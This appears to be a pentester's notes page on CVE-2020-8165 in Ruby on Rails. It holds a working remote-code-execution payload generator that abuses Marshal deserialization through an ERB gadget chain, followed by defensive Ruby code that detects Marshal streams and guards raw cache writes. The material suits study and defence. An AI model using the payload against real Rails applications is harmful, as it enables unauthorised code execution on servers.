xct's notes
Ruby

CVE-2020-8165

Exploitable in Rails < 5.2.4.3 and Rails < 6.0.3.1 (install with `apt install ruby-railties`) when Memcache/Redis is used with `raw: true`. The following script generates the payload data; use it on a field whose value is going to Memcache/Redis:
```ruby
require 'erb'
require 'rails/all'

remote_code = <<-RUBY
`whoami`
RUBY

erb = ERB.allocate
erb.instance_variable_set(:@src, remote_code)
erb.instance_variable_set(:@lineno, 0)
deprecation = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result)
exploit_data = Marshal.dump(deprecation)
puts URI.encode_www_form(payload: exploit_data)
```
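A defensive counterpart, added here as an example (not part of the original notes and not the Rails patch): it flags form fields whose decoded value is a Marshal stream, recognised by the two-byte version header, and refuses to hand such a value to a `raw: true` cache write. The helper names, `StubCache` and the sample request body are constructed for illustration; the sample marshals a harmless array.

```ruby
require 'uri'

# Marshal streams begin with a two-byte format version (currently 4, 8).
MARSHAL_HEADER = [Marshal::MAJOR_VERSION, Marshal::MINOR_VERSION].pack('C2').freeze

# True when the raw bytes of +value+ start with the Marshal version header.
def marshal_stream?(value)
  value.is_a?(String) && value.b.start_with?(MARSHAL_HEADER)
end

# Names of fields in a urlencoded body whose decoded value is a Marshal stream.
# Decoding as BINARY keeps the bytes intact (no UTF-8 scrubbing).
def suspicious_fields(form_body)
  URI.decode_www_form(form_body, Encoding::BINARY)
     .select { |_name, value| marshal_stream?(value) }
     .map(&:first)
end

# Hypothetical wrapper for call sites that use raw: true. +cache+ is anything
# responding to write(key, value, raw: true), for example Rails.cache.
def guarded_raw_write(cache, key, value)
  raise ArgumentError, "refusing Marshal stream for raw cache key #{key}" if marshal_stream?(value)

  cache.write(key, value, raw: true)
end

# Constructed sample: a harmless array stands in for a serialized object.
SAMPLE_BODY = URI.encode_www_form(name: 'alice', payload: Marshal.dump(['benign', 1]))

# Minimal stand-in for a cache store so the example runs without Rails.
class StubCache
  attr_reader :data

  def initialize
    @data = {}
  end

  def write(key, value, raw: false)
    @data[key] = value
    true
  end
end

puts "flagged fields: #{suspicious_fields(SAMPLE_BODY).inspect}" if __FILE__ == $PROGRAM_NAME
```

The header check is a tripwire for logging and input validation on affected call sites; the versions named above are where the unmarshalling behaviour itself is fixed.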

Interesting Reads

Last modified 5mo ago